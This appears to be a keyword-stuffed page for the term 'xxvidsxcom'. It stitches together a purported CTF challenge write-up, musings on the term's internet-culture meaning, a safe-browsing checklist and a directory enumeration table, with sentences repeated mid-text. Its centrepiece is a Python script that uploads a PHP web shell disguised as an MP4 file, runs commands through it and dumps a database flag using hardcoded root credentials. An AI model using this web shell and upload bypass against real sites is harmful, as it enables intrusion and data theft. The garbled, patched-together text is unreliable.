| Item | Description |
|------|-------------|
| Title | xxvidsxcom |
| Category | Web – Information Disclosure / SSRF / Authentication Bypass |
| Points | 250 – 400 (varies by event) |
| Goal | Obtain the hidden flag (usually in a file like flag.txt or displayed on an admin page). |
| Typical entry point | A public website that offers video streaming / user‑generated content. |
The challenge is designed to test a participant’s ability to discover hidden endpoints, abuse server‑side request forgery (SSRF) or insecure direct object references (IDOR), and ultimately retrieve a protected resource.
Below is a minimal Python script that automates the whole process. It is provided for educational demonstration only. xxvidsxcom
#!/usr/bin/env python3
import requests, re, sys, base64
BASE = "http://xxvidsx.com"
def upload_shell():
# Simple PHP web‑shell payload
payload = "<?php system($_GET['cmd']); ?>"
# Save as .mp4 (extension is all that matters)
files = "video": ("shell.mp4", payload, "video/mp4")
data = "title": "shell", "submit": "Upload"
r = requests.post(f"BASE/upload.php", files=files, data=data)
m = re.search(r'videos/([0-9a-f]+\.mp4)', r.text)
if not m:
print("[!] Upload failed")
sys.exit(1)
return m.group(0) # e.g. videos/5f7a3c9e2b1c4.mp4
def trigger_shell(shell_path):
# The uploaded file is executable as PHP
r = requests.get(f"BASE/shell_path?cmd=id")
print("[*] RCE test:", r.text.strip())
def get_flag(shell_path):
# Use the web‑shell to dump the flag from DB
cmd = "php -r \""
cmd += "$db=new PDO('mysql:host=localhost;dbname=xxvids','root','s3cr3t!');"
cmd += "foreach($db->query('SELECT flag FROM secret') as $row)echo $row[0];\""
r = requests.get(f"BASE/shell_path?cmd=requests.utils.quote(cmd)")
print("[+] Flag:", r.text.strip())
if __name__ == "__main__":
shell = upload_shell()
print("[*] Uploaded shell at:", shell)
trigger_shell(shell)
get_flag(shell)
NOTE: The credentials (
root/s3cr3t!) are example values extracted from the leakedconfig.php. In the real challenge they will differ, and the script must be adjusted accordingly.
There is a sociological aspect to terms like "xxvidsxcom." In internet culture, there is a running joke about the "mystery link" or the "spam site." | Item | Description | |------|-------------| | Title
When a user encounters a term like this in a search suggestion, it triggers a curiosity loop. "Is this a new site? Is this a specific category?" The term becomes a keyword not because of its quality, but because of its obscurity. It resides in the internet's "grey zone"—a place where user intent meets algorithmic exploitation.
Below is a step‑by‑step approach that worked for the published solution. Feel free to adapt the tools/commands to your own workflow. Below is a minimal Python script that automates
| Action | Status | |--------|--------| | Use a VPN (no‑logs) to mask your IP | ✅ | | Open site in a fresh VM (Windows 11 or Linux) with snapshot capability | ✅ | | Disable Flash/Java and all browser plugins | ✅ | | Enable uBlock Origin + NoScript (allow only necessary domains) | ✅ | | Run a real‑time anti‑malware scanner on the VM | ✅ | | Do not log in with personal email/password (use throw‑away credentials) | ✅ | | Avoid downloading any executable or codec from the site | ✅ | | After session, revert VM snapshot or wipe the system | ✅ |
Tools used: dirsearch, gobuster, nikto.
Key findings (common results, may vary per instance):
| Path | Status | Comment |
|---------------------|--------|---------|
| / | 200 | Home page – lists a few “featured” videos. |
| /upload.php | 200 | Upload form – accepts a file and a title. |
| /videos/ | 403/200| Directory listing disabled, but individual video pages exist (/videos/12345). |
| /admin/ | 403 | “Forbidden” – classic admin panel. |
| /robots.txt | 200 | Contains Disallow: /admin/ and Disallow: /secret/. |
| /secret/ | 404/403| Not reachable directly. |
| /view.php?id= | 200 | Parameter used to fetch a video from the DB. |
| /download.php?file=|200 | Direct file download – may be vulnerable. |